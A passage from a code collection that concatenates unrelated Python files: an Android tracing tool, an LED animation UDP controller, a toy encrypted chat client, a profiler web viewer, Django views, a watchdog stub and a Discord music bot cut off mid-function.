serverstr = "%s %s %s" % (server.name, server.host, server.port)
name = nodestr.split()[1]
dirname = os.path.join(self.session.session_dir, name + ".conf")
filename = os.path.join(dirname, "server")
try:
os.makedirs(dirname)
except OSError:
# directory may already exist from previous distributed run
logging.exception("error creating directory: %s", dirname)
try:
with open(filename, "w") as f:
f.write("%s\n%s\n" % (serverstr, nodestr))
except IOError:
logging.exception("error writing server file %s for node %s", filename, name)
def local_instantiation_complete(self):
"""
Set the local server"s instantiation-complete status to True.
:return: nothing
"""
# TODO: do we really want to allow a localhost to not exist?
with self.servers_lock:
server = self.servers.get("localhost")
if server is not None:
server.instantiation_complete = True
# broadcast out instantiate complete
tlvdata = b""
tlvdata += coreapi.CoreEventTlv.pack(EventTlvs.TYPE.value, EventTypes.INSTANTIATION_COMPLETE.value)
message = coreapi.CoreEventMessage.pack(0, tlvdata)
for session_client in self.session_clients:
session_client.sendall(message)
def instantiation_complete(self):
"""
Return True if all servers have completed instantiation, False
otherwise.
:return: have all server completed instantiation
:rtype: bool
"""
with self.servers_lock:
for name in self.servers:
server = self.servers[name]
if not server.instantiation_complete:
return False
return True
|
rheatrace.py
|
#!/usr/bin/env python
# Copyright (C) 2021 ByteDance Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Usage: rhea.py [options] [category1 [category2 ...]]
Example: rheatrace.py -b 32768 -t 15 -o trace.html -a
Options:
-h, --help show this help message and exit
-a APP_NAME, --app=APP_NAME
enable application-level tracing for comma-separated
list of app cmdlines
-e DEVICE_SERIAL_NUMBER, --serial=DEVICE_SERIAL_NUMBER
adb device serial number
-b N, --buf-size=N use a trace buffer size of N KB
-t N, --time=N trace for N seconds
-o FILE write trace output to FILE
-k KFUNCS, --ktrace=KFUNCS
specify a comma-separated list of kernel functions to
trace
--from-file File read the trace from a file (compressed) rather than'
'running a live trace
--categories=SYSTRACE_CATEGORIES
Select categories with a comma-delimited list, e.g.
cat1,cat2,cat3
-l, --list-categories
list the available categories and exit
RheaTrace options:
-v, --version rhea script version and exit.
-r, restart if app is running, it will be killed and restart.
"""
import os
import sys
import logging
import shutil
import time
import multiprocessing
import optparse
import rhea_config
from common.context import Context
from common import env_checker
from enhanced_systrace import systrace_capturer
from rhea_atrace import atrace_capturer
from common import cmd_executer
from rhea_atrace.rhea_log.rhea_logger import rhea_logger, set_logger
from trace_processor import TraceProcessor
logger = rhea_logger
def add_sys_options(parser):
parser.add_option('-a', '--app', dest='app_name', default=None, type='string', action='store',
help='enable application-level tracing for comma-separated list of app cmdlines')
parser.add_option('-e', '--serial', dest='device_serial_number', type='string', help='adb device serial number')
parser.add_option('-b', '--buf-size', dest='trace_buf_size',
type='int', default='32768', help='use a trace buffer size of N KB', metavar='N')
parser.add_option('-t', '--time', dest='trace_time', type='int',
help='trace for N seconds', metavar='N')
parser.add_option('-o', dest='output_file', help='write trace output to FILE',
default=None, metavar='FILE')
parser.add_option('-k', '--ktrace', dest='kfuncs', action='store',
help='specify a comma-separated list of kernel functions '
'to trace')
parser.add_option('--from-file', dest='from_file', action='store',
help='read the trace from a file (compressed) rather than'
'running a live trace')
parser.add_option('--categories', dest='systrace_categories',
help='Select categories with a comma-delimited '
'list, e.g. cat1,cat2,cat3')
parser.add_option('-l', '--list-categories', dest='list_categories',
default=False, action='store_true',
help='list the available categories and exit')
return parser
def add_extra_options(parser):
options = optparse.OptionGroup(parser, 'RheaTrace options')
options.add_option('-v', '--version', dest='version', action="store_true", default=False,
help="rhea script version and exit")
parser.add_option('--advanced-sys-time', dest='advanced_systrace_time', type='int',
default='2', help='advanced systrace time for N seconds', metavar='N')
parser.add_option('-r', '--restart', dest='restart',
default=False, action='store_true',
help='if app is running, it will be killed and restart.')
parser.add_option('--debug', dest='debug',
default=False, action='store_true',
help='Set the log switch to debug level.')
return options
def parse_options(argv):
"""Parses and checks the command-line options."""
usage = 'Usage: %prog [options] [category1 [category2 ...]]'
desc = 'Example: %prog -b 32768 -t 15 gfx input view sched freq'
parser = optparse.OptionParser(usage=usage, description=desc,
conflict_handler="resolve")
parser = add_sys_options(parser)
option_group = add_extra_options(parser)
if option_group:
parser.add_option_group(option_group)
(options, categories) = parser.parse_args(argv[1:])
"""arg check"""
if options.output_file is None:
options.output_file = rhea_config.DEFAULT_OUTPUT_FILE
context = Context.instance()
context.set_options(options, categories, multiprocessing.Manager().dict())
return context
def _initialize_devices(context):
from devil.android.sdk import adb_wrapper
from systrace import run_systrace
run_systrace.initialize_devil()
devices = [device.GetDeviceSerial() for device in adb_wrapper.AdbWrapper.Devices()]
if context.serial_number is None:
if len(devices) == 0:
logger.error('no adb devices connected.')
return False
elif len(devices) == 1:
context.serial_number = devices[0]
return True
elif len(devices) >= 2:
logger.error('multiple devices connected, serial number required')
return False
elif context.serial_number not in devices:
logger.error('Device with the serial number "%s" is not connected.'
% context.serial_number)
return False
return True
def remove_all_stale_pyc_files(base_dir):
"""Scan directories for old .pyc files without a .py file and delete them."""
for dirname, _, filenames in os.walk(base_dir):
if '.git' in dirname:
continue
for filename in filenames:
root, ext = os.path.splitext(filename)
if ext != '.pyc':
continue
pyc_path = os.path.join(dirname, filename)
py_path = os.path.join(dirname, root + '.py')
try:
if not os.path.exists(py_path):
os.remove(pyc_path)
except OSError:
# Wrap OS calls in try/except in case another process touched this file.
pass
try:
os.removedirs(dirname)
except OSError:
# Wrap OS calls in try/except in case another process touched this dir.
pass
def init_build_dir(context):
if os.path.exists(context.build_dir) and os.path.isdir(context.build_dir):
shutil.rmtree(context.build_dir)
os.makedirs(context.build_dir)
def show_version():
"""
show current rheatrace script version
"""
print "Current version is %s.\n" % rhea_config.VERSION_CODE
sys.exit(0)
def main_impl(argv):
"""check environment variables, if not satisfied, will exit"""
is_python_2_7 = env_checker.check_python()
if is_python_2_7 is False:
sys.exit(1)
remove_all_stale_pyc_files(os.path.dirname(__file__))
"""parse input options."""
context = parse_options(argv)
"""clean and mkdirs"""
init_build_dir(context)
set_logger(None, context.build_dir)
if context.debug:
set_logger(logging.DEBUG, context.build_dir)
if context.show_version:
show_version()
sys.exit(1)
elif context.list_categories:
(out, return_code) = systrace_capturer.show_list_categories(context.serial_number)
logger.info("\n" + out)
sys.exit(1)
elif context.trace_time < 0:
logger.error('trace time must be specified or a non-negative number')
sys.exit(1)
elif context.trace_buf_size < 0:
logger.error('trace buffer size must be a positive number')
sys.exit(1)
elif context.advanced_systrace_time < 0:
logger.error('advanced systrace time must be a positive number')
sys.exit(1)
elif context.from_file:
(out, return_code) = systrace_capturer.from_file(context.from_file)
logger.info("\n" + out)
sys.exit(1)
else:
if context.app_name is None or "":
logger.error("app name must be specified, using '-a' to set app name.")
sys.exit(1)
env_ok = env_checker.check_env()
if not env_ok:
sys.exit(1)
if not _initialize_devices(context):
sys.exit(1)
"""delete rheatrace.stop file"""
if __delete_rheatrace_stop_file(context) is False:
logger.debug("failed to delete rhea-atrace.stop file, maybe it's not exist.")
"""check whether app is installed or not."""
result = __check_install(context.app_name, context.serial_number)
if not result:
logger.warning("app '%s' is not installed, please check your inputs.", context.app_name)
sys.exit(1)
"""start to capture systrace"""
_systrace_capturer = multiprocessing.Process(target=systrace_capturer.capture, args={context})
_systrace_capturer.start()
time.sleep(context.advanced_systrace_time)
"""launch app and capture atrace"""
_atrace_capturer = multiprocessing.Process(target=atrace_capturer.capture, args={context})
_atrace_capturer.start()
_systrace_capturer.join()
_atrace_capturer.join()
logger.debug("waiting for writing rhea-atrace.gz file.")
time_loop = 0
while time_loop < 20:
if __is_rheatrace_stop_file_exist(context):
logger.debug("finish to write rhea-atrace.gz file.")
break
else:
time_loop = time_loop + 2
time.sleep(2)
if not __is_rheatrace_stop_file_exist(context):
logger.error("failed to write rhea-atrace.gz file completely.")
trace_processor = TraceProcessor(context)
trace_processor.processor()
def __check_install(app_name, serial_number):
if app_name is None:
return False
cmd = ["shell", "pm", "path", app_name]
(output, return_code) = cmd_executer.exec_commands(cmd_executer.get_complete_abd_cmd(cmd, serial_number))
if len(output) > 0:
return True
else:
return False
def __is_rheatrace_stop_file_exist(context):
commands = [
"ls " + rhea_config.ATRACE_APP_GZ_FILE_LOCATION.replace("%s", context.app_name) + "rheatrace.stop",
"exit"
]
(out, return_code) = cmd_executer.exec_adb_shell_with_append_commands(commands, context.serial_number)
if return_code is 0:
return True
else:
return False
def __delete_rheatrace_stop_file(context):
commands = [
"cd " + rhea_config.ATRACE_APP_GZ_FILE_LOCATION.replace("%s", context.app_name),
"rm rheatrace.stop",
"exit"
]
(out, return_code) = cmd_executer.exec_adb_shell_with_append_commands(commands, context.serial_number)
if return_code is 0:
return True
else:
return False
if __name__ == "__main__":
main_impl(sys.argv)
|
animation.py
|
'''
Steps for adding a new pattern:
1. Create new animation function using the template
2. Add the new animation function to the setPattern switch statement
3. Increase the shufflePattern() function's randint by 1
'''
'''
Animation Function Template:
def Function():
global animation
animation = Function
#send udp string
MESSAGE = "Function"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
'''
#import led
import config
import visualization
import microphone
#import other
import colorsys
import time
import threading
import socket
import random
################################ GLOBAL VARIABLES #########################################
lastShuffle = 0
shuffleDuration = 10.0
shufflingV = False
wasShufflingV = False
shuffler = threading.Timer(1.0, print)
shuffler.daemon = True
UDP_IP = config.UDP_IP
UDP_PORT = config.UDP_PORT
currentVis = ""
currentColor = {"r": 255, "g":255, "b":255}
isRunning = False
################################ POWER CONROLS #########################################
def on():
print("animation on")
animation()
def off():
print("animation off")
global animation
global wasShufflingV
if animation == visualize:
if shufflingV:
wasShufflingV = True
stop()
elif animation == startShufflePattern:
stopShuffle()
MESSAGE = "off"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
################################ SLIDER CONTROLS #########################################
def setBrightness(brightness):
print("animation brightnes")
print(brightness)
MESSAGE = 'brightness {}'.format(brightness)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def setSpeed(speed):
print("animation Speed")
print(speed)
speedMap = {1:15, 2:30, 3:60, 4:120, 5:240, 6:480}
MESSAGE = 'speed {}'.format(speedMap[speed])
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
################################ PATTERN ANIMATIONS #########################################
def setPattern(pattern):
patternString = ""
if animation == visualize:
stop()
if pattern == 0:
patternString = "Shuffle"
startShufflePattern()
elif pattern == 1:
patternString = "Flash"
flash()
elif pattern == 2:
patternString = "Fade"
fade()
elif pattern == 3:
patternString = "Rainbow"
rainbow()
elif pattern == 4:
patternString = "Rainbow With Glitter"
rainbowWithGlitter()
elif pattern == 5:
patternString = "Cylon"
cylon()
elif pattern == 6:
patternString = "Sinelon"
sinelon()
elif pattern == 7:
patternString = "Confetti"
confetti()
elif pattern == 8:
patternString = "BPM"
bpm()
elif pattern == 9:
patternString = "Juggle"
juggle()
else:
patternString = "Error Not a Pattern"
print(patternString)
return patternString
def shufflePattern():
global lastShuffle
global shuffler
global animation
if animation != startShufflePattern:
stopShuffle()
return
newShuffle = random.randint(1,9)
while(lastShuffle == newShuffle):
newShuffle = random.randint(1,9)
lastShuffle = newShuffle
setPattern(newShuffle)
animation = startShufflePattern
shuffler = threading.Timer(shuffleDuration, shufflePattern)
shuffler.daemon = True
shuffler.start()
def startShufflePattern():
stopShuffle()
global animation
animation = startShufflePattern
shufflePattern()
def stopShuffle():
global shuffler
global shufflingV
shuffler.cancel()
shufflingV = False
def flash():
global animation
animation = flash
#send udp string
MESSAGE = "flash"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def fade():
global animation
animation = fade
#send udp string
MESSAGE = "fade"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def rainbow():
global animation
animation = rainbow
#send udp string
MESSAGE = "rainbow"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def rainbowWithGlitter():
global animation
animation = rainbowWithGlitter
#send udp string
MESSAGE = "rainbowWithGlitter"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def cylon():
global animation
animation = cylon
#send udp string
MESSAGE = "cylon"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def sinelon():
global animation
animation = sinelon
#send udp string
MESSAGE = "sinelon"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def confetti():
global animation
animation = confetti
#send udp string
MESSAGE = "confetti"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def bpm():
global animation
animation = bpm
#send udp string
MESSAGE = "bpm"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def juggle():
global animation
animation = juggle
#send udp string
MESSAGE = "juggle"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
################################ VISUALIZATION ANIMATIONS #########################################
def setVisualization(visualization):
global currentVis
global wasShufflingV
visualizationString = ""
if visualization == 0:
visualizationString = "Shuffle"
startShuffleVisualization()
elif visualization == 1:
visualizationString = "Energy"
currentVis = "energy"
stopShuffle()
wasShufflingV = False
visualize()
elif visualization == 2:
visualizationString = "Spectrum"
currentVis = "spectrum"
stopShuffle()
wasShufflingV = False
visualize()
elif visualization == 3:
visualizationString = "Scroll"
currentVis = "scroll"
stopShuffle()
wasShufflingV = False
visualize()
else:
stopShuffle()
visualizationString = "Error Not a Visualization"
print(visualizationString)
return visualizationString
def stop():
print("Stopping")
microphone.running = False
stopShuffle()
time.sleep(.01)
def shuffleVisualization():
global lastShuffle
global shuffler
global currentVis
if not shufflingV:
stopShuffle()
return
newShuffle = random.randint(1,3)
while(lastShuffle == newShuffle):
newShuffle = random.randint(1,3)
lastShuffle = newShuffle
if newShuffle == 1:
currentVis = "energy"
elif newShuffle == 2:
currentVis = "spectrum"
else:
currentVis = "scroll"
visualize()
shuffler = threading.Timer(shuffleDuration, shuffleVisualization)
shuffler.daemon = True
shuffler.start()
def startShuffleVisualization():
stopShuffle()
global animation
global shufflingV
shufflingV = True
animation = visualize
shuffleVisualization()
def visualize():
global currentVis
global animation
global wasShufflingV
if(not microphone.running):
animation = juggle
if wasShufflingV:
wasShufflingV = False
startShuffleVisualization()
return
if currentVis == "scroll":
scrollMusic()
elif currentVis == "spectrum":
spectrumMusic()
else:
energyMusic()
def energyMusic():
global animation
global isRunning
if animation != visualize:
MESSAGE = "visualize"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
isRunning = False
animation = visualize
visualization.visualization_effect = visualization.visualize_energy
if not isRunning:
isRunning = True;
print('now running')
t = threading.Thread(target=microphone.start_stream, args=[visualization.microphone_update])
t.daemon = True
t.start()
def scrollMusic():
global animation
global isRunning
if animation != visualize:
MESSAGE = "visualize"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
isRunning = False
animation = visualize
visualization.visualization_effect = visualization.visualize_scroll
if not isRunning:
isRunning = True;
print('now running')
t = threading.Thread(target=microphone.start_stream, args=[visualization.microphone_update])
t.daemon = True
t.start()
def spectrumMusic():
global animation
global isRunning
if animation != visualize:
isRunning = False
MESSAGE = "visualize"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
animation = visualize
visualization.visualization_effect = visualization.visualize_spectrum
if not isRunning:
isRunning = True;
print('now running')
t = threading.Thread(target=microphone.start_stream, args=[visualization.microphone_update])
t.daemon = True
t.start()
################################ COLOR ANIMATIONS #########################################
def staticRGB(r, g, b):
print('animation color')
print(r,g,b)
global animation
global currentColor
currentColor["r"] = r
currentColor["g"] = g
currentColor["b"] = b
if animation == visualize:
stop()
animation = setColor
MESSAGE = 'static {} {} {}'.format(r, g, b)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def setColor():
global currentColor
staticRGB(currentColor["r"], currentColor["g"], currentColor["b"])
################################ ANIMATION GLOBAL #########################################
animation = juggle
|
client.py
|
import socket
import sys
import json
import threading
import random
import base64
from simplecrypt import encrypt, decrypt
from config import SERVER_ADDRESS, BUFSIZE, MODULUS, BASE
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(SERVER_ADDRESS)
secret_key = random.randint(1, MODULUS)
public_key = (BASE ** secret_key) % MODULUS
e2e_key = None
def calculate_e2ekey(pubkey):
global e2e_key
e2e_key = (pubkey ** secret_key) % MODULUS
def send_message(text):
sock.send(bytes(json.dumps({'type': 'message', 'text': text}), 'utf8'))
def handle_read():
while True:
data = sock.recv(BUFSIZE).decode('utf8')
data = json.loads(data)
if data.get('type') == 'init':
# public key lawan chat
pubkey = data.get('pubkey')
calculate_e2ekey(pubkey)
print('system\t>>\tReady! (e2e key={})'.format(e2e_key))
if data.get('type') == 'system':
print('system\t>>\t{}'.format(data['text']))
# hanya tampilkan pesan dari lawan chat atau system
if data.get('type') == 'message' and data.get('name') != sys.argv[1]:
decoded = base64.b64decode(data['text'])
text = decrypt(str(e2e_key), decoded)
print('{}\t>>\t{}'.format(data['name'], text.decode('utf8')))
if __name__ == '__main__':
print('\nsecret_key={}'.format(secret_key))
print('public_key={}\n\n'.format(public_key))
try:
# send init message first
sock.send(
bytes(json.dumps({'type': 'init', 'name': sys.argv[1], 'pubkey': public_key}), 'utf8'))
thread = threading.Thread(target=handle_read).start()
while True:
msg = input()
if msg == 'quit':
send_message('quit')
break
else:
chipertext = encrypt(str(e2e_key), msg)
send_message(base64.b64encode(chipertext).decode('utf8'))
finally:
sock.close()
|
iprofile_app.py
|
import os
import sys
import time
import webbrowser
import threading
import json
try:
import tornado
import tornado.ioloop
import tornado.web
except ImportError:
tornado = None
from collections import defaultdict, deque
from itertools import groupby
from openmdao.devtools.iprofile import _process_profile, _iprof_py_file
from openmdao.devtools.iprof_utils import func_group, _setup_func_group
from openmdao.utils.mpi import MPI
def _launch_browser(port):
"""
Open the default web browser to localhost:<port>
"""
time.sleep(1)
webbrowser.get().open('http://localhost:%s' % port)
def _startThread(fn):
"""
Start a daemon thread running the given function.
"""
thread = threading.Thread(target=fn)
thread.setDaemon(True)
thread.start()
return thread
def _parent_key(d):
"""
Return the function path of the parent of function specified by 'id' in the given dict.
"""
parts = d['id'].rsplit('|', 1)
if len(parts) == 1:
return ''
return parts[0]
def _stratify(call_data, sortby='time'):
"""
Group node data by depth and sort within a depth by parent and 'sortby'.
"""
depth_groups = []
node_list = [] # all nodes in a single list
depthfunc=lambda d: d['depth']
for key, group in groupby(sorted(call_data.values(), key=depthfunc), key=depthfunc):
# now further group each group by parent, then sort those in descending order
# by 'sortby'
depth_groups.append({
key: sorted(sub, key=lambda d: d[sortby], reverse=True)
for key, sub in groupby(sorted(group, key=_parent_key), key=_parent_key)
})
max_depth = len(depth_groups)
delta_y = 1.0 / max_depth
y = 0
max_x = call_data['$total'][sortby]
for depth, pardict in enumerate(depth_groups):
y0 = delta_y * depth
y1 = y0 + delta_y
for parent, children in pardict.items():
if not parent:
end_x = 0
else:
end_x = call_data[parent]['x0'] * max_x
for i, node in enumerate(children):
start_x = end_x
end_x += node[sortby]
node['x0'] = start_x / max_x
node['x1'] = end_x / max_x
node['y0'] = y0
node['y1'] = y1
node['idx'] = len(node_list)
node_list.append(node)
return depth_groups, node_list
def _iprof_setup_parser(parser):
if not func_group:
_setup_func_group()
parser.add_argument('-p', '--port', action='store', dest='port',
default=8009, type=int,
help='port used for web server')
parser.add_argument('--no_browser', action='store_true', dest='noshow',
help="Don't pop up a browser to view the data.")
parser.add_argument('-t', '--title', action='store', dest='title',
default='Profile of Method Calls by Instance',
help='Title to be displayed above profiling view.')
parser.add_argument('-g', '--group', action='store', dest='methods',
default='openmdao',
help='Determines which group of methods will be tracked. Current '
'options are: %s and "openmdao" is the default' %
sorted(func_group.keys()))
parser.add_argument('-m', '--maxcalls', action='store', dest='maxcalls',
default=15000, type=int,
help='Maximum number of calls displayed at one time. Default=15000.')
parser.add_argument('file', metavar='file', nargs='+',
help='Raw profile data files or a python file.')
if tornado is None:
def _iprof_exec(options, user_args):
"""
Called from a command line to instance based profile data in a web page.
"""
raise RuntimeError("The 'iprof' function requires the 'tornado' package. "
"You can install it using 'pip install tornado'.")
else:
class _Application(tornado.web.Application):
def __init__(self, options):
self.call_data, _ = _process_profile(options.file)
self.depth_groups, self.node_list = _stratify(self.call_data)
self.options = options
# assemble our call_data nodes into a tree structure, where each
# entry contains that node's call data and a dict containing each
# child keyed by call path.
self.call_tree = tree = defaultdict(lambda: [None, {}])
for path, data in self.call_data.items():
data['id'] = path
parts = path.rsplit('|', 1)
# add our node to our parent
if len(parts) > 1:
tree[parts[0]][1][path] = data
tree[path][0] = data
handlers = [
(r"/", _Index),
(r"/func/([0-9]+)", _Function),
]
settings = dict(
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
)
super().__init__(handlers, **settings)
def get_nodes(self, idx):
"""
Yield all children of the given root up to a maximum number stored in options.maxcalls.
"""
if idx == 0:
root = self.call_tree['$total']
else:
root = self.node_list[idx]
root = self.call_tree[root['id']]
maxcalls = self.options.maxcalls
stack = deque()
stack.appendleft(root)
callcount = 1
stop_adding = False
while stack:
parent, children = stack.pop()
yield parent
if not stop_adding:
callcount += len(children)
if callcount <= maxcalls:
for child in children.values():
stack.appendleft(self.call_tree[child['id']])
else:
stop_adding = True
class _Index(tornado.web.RequestHandler):
def get(self):
"""
Load the page template and request call data nodes starting at idx=0.
"""
app = self.application
self.render("iprofview.html", title=app.options.title)
class _Function(tornado.web.RequestHandler):
def get(self, idx):
"""
Request an updated list of call data nodes, rooted at the node specified by idx.
"""
app = self.application
dump = json.dumps(list(app.get_nodes(int(idx))))
self.set_header('Content-Type', 'application/json')
self.write(dump)
def _iprof_exec(options, user_args):
"""
Called from a command line to instance based profile data in a web page.
"""
if options.file[0].endswith('.py'):
if len(options.file) > 1:
print("iprofview can only process a single python file.", file=sys.stderr)
sys.exit(-1)
_iprof_py_file(options, user_args)
if MPI:
options.file = ['iprof.%d' % i for i in range(MPI.COMM_WORLD.size)]
else:
options.file = ['iprof.0']
if not options.noshow and (not MPI or MPI.COMM_WORLD.rank == 0):
app = _Application(options)
app.listen(options.port)
print("starting server on port %d" % options.port)
serve_thread = _startThread(tornado.ioloop.IOLoop.current().start)
launch_thread = _startThread(lambda: _launch_browser(options.port))
while serve_thread.is_alive():
serve_thread.join(timeout=1)
|
views.py
|
from django.shortcuts import render
from django.contrib import messages
import threading
from .Functions import gan_generate
from .Functions.rnn_generate import RNN_generator
from .forms import *
def index(request):
"""
A start view
"""
form = TaskForm()
context = {'form': form}
return render(request, 'index.html', context)
def generate(request):
"""
A view, which run background process to generate text using selected model
"""
form = TaskForm()
context = {'form': form}
if request.method == 'POST':
form = TaskForm(request.POST)
if form.is_valid():
tmp = form.cleaned_data['select_model']
if tmp == 'rnn':
t = threading.Thread(target=generate_using_rnn, args=[request, form.cleaned_data['first_word']])
t.setDaemon(True)
t.start()
t.join()
elif tmp == 'gan':
t = threading.Thread(target=generate_using_gan, args=[request])
t.setDaemon(True)
t.start()
t.join()
context = {'form': form, 'select_model': tmp, 'first_word': form.cleaned_data['first_word']}
return render(request, 'index.html', context)
def generate_using_rnn(request, first_word):
"""
Method which run RNN generating algorithm
"""
rnn = RNN_generator(first_word)
result = rnn.run()
messages.info(request, result)
def generate_using_gan(request):
"""
Method which GAN generating algorithm
"""
result = gan_generate.run()
messages.info(request, result)
|
watchdog.py
|
# coding=utf8
# Watch background processes/threads
import threading
from time import sleep
from lib._logging import logger
class Watchdog():
def __init__(self,interval=30):
'''
Initialize Watchdog
Keyword Arguments:
interval {number} -- time to sleep between checking watchlist (default: {30})
'''
logging.debug('Watchdog.__init__() called...')
self.interval = interval
self.watchlist = []
logging.info('Watchdog initialized')
def addThread(self, thread):
logging.debug('Watchdog.addThread(' + str(thread.name) + ') called...')
if thread in self.watchlist:
logging.warn(str(thread.name) + ' is already in watchlist.')
else:
self.watchlist.append(thread)
logging.info('Thread added to watchlist: ' + str(thread.name))
def stop(self):
'''
stop Watchdog loop thread
'''
logger.debug('Watchdog.stop() called...')
logger.info('Stopping Watchdog thread')
self.looping = False
self.status = "stopped"
def start(self):
'''
start Watchdog loop thread
'''
logger.info('Starting Watchdog thread')
logger.debug('Watchdog.start() called...')
self.looping = True
self.thread = threading.Thread(name='watchdog', target=self._loop)
self.thread.daemon = True
self.thread.start()
self.status = "running"
def _loop(self):
'''
Monitor status of application threads
'''
logger.debug( 'Watchdog._loop() started...' )
#keep track of the ip addresses we have already scanned
ip_list = []
while self.looping:
for thread in self.watchlist:
logging.debug('Checking status of thread: ' + thread.name)
#TODO... Check the status of the thread...
sleep(self.interval)
|
__main__.py
|
from discord.ext import commands
import os
from threading import Thread
import time
import re
import lavalink
import discord
class Bot:
def __init__(self, **kwargs):
self.intents = discord.Intents.default()
self.intents.members = True
if "prefix" not in kwargs:
raise "You must provide a prefix"
else:
self.bot = commands.Bot(command_prefix = kwargs["prefix"], intents = self.intents)
self.bot.lavalinkpass = kwargs["lavalinkpass"]
self.bot.lavalinkport = kwargs["lavalinkport"]
def connect(self, token):
def lavarun():
os.system("java -jar Lavalink.jar")
print("Starting processes!")
time.sleep(5)
print("Running Lavalink.")
Thread(target = lavarun).start()
time.sleep(30) # yep i intentionally used a blocking module
# lavalink takes a while to boot up
# so this is to make sure its ready when bot gets ready
self.bot.add_cog(init(self.bot))
print("-------------------------------\nRunning Bot!")
self.bot.run(token)
class init(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
print("The bot is ready!")
self.bot.add_cog(Music(self.bot))
url_rx = re.compile(r'https?://(?:www\.)?.+')
class Music(commands.Cog):
def __init__(self, bot):
self.bot = bot
if not hasattr(bot, 'lavalink'):
bot.lavalink = lavalink.Client(bot.user.id)
bot.lavalink.add_node("0.0.0.0", self.bot.lavalinkport, self.bot.lavalinkpass, 'na', 'default-node')
bot.add_listener(bot.lavalink.voice_update_handler, 'on_socket_response')
lavalink.add_event_hook(self.track_hook)
def cog_unload(self):
self.bot.lavalink._event_hooks.clear()
async def cog_before_invoke(self, ctx):
guild_check = ctx.guild is not None
if guild_check:
await self.ensure_voice(ctx)
return guild_check
async def cog_command_error(self, ctx, error):
if isinstance(error, commands.CommandInvokeError):
await ctx.send(error.original)
async def ensure_voice(self, ctx):
player = self.bot.lavalink.player_manager.create(ctx.guild.id, endpoint=str(ctx.guild.region))
should_connect = ctx.command.name in ('play',)
if not ctx.author.voice or not ctx.author.voice.channel:
raise commands.CommandInvokeError('Join a voicechannel first.')
if not player.is_connected:
if not should_connect:
raise commands.CommandInvokeError('Not connected.')
permissions = ctx.author.voice.channel.permissions_for(ctx.me)
if not permissions.connect or not permissions.speak:
raise commands.CommandInvokeError('I need the `CONNECT` and `SPEAK` permissions.')
player.store('channel', ctx.channel.id)
await self.connect_to(ctx.guild.id, str(ctx.author.voice.channel.id))
else:
if int(player.channel_id) != ctx.author.voice.channel.id:
raise commands.CommandInvokeError('You need to be in my voicechannel.')
async def track_hook(self, event):
if isinstance(event, lavalink.events.QueueEndEvent):
guild_id = int(event.player.guild_id)
await self.connect_to(guild_id, None)
async def connect_to(self, guild_id: int, channel_id: str):
ws = self.bot._connection._get_websocket(guild_id)
await ws.voice_state(str(guild_id), channel_id)
@commands.command(aliases=['p'])
async def play(self, ctx, *, query: str):
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
query = query.strip('<>')
if not url_rx.match(query):
query = f'ytsearch:{query}'
results = await player.node.get_tracks(query)
if not results or not results['tracks']:
return await ctx.send('Nothing found!')
embed = discord.Embed(color=discord.Color.blurple())
# Valid loadTypes are:
# TRACK_LOADED - single video/direct URL)
# PLAYLIST_LOADED - direct URL to playlist)
# SEARCH_RESULT - query prefixed with either ytsearch: or scsearch:.
# NO_MATCHES - query yielded no results
# LOAD_FAILED - most likely, the video encountered an exception during loading.
if results['loadType'] == 'PLAYLIST_LOADED':
tracks = results['tracks']
for track in tracks:
player.add(requester=ctx.author.id, track=track)
embed.title = 'Playlist Enqueued!'
embed.description = f'{results["playlistInfo"]["name"]} - {len(tracks)} tracks'
else:
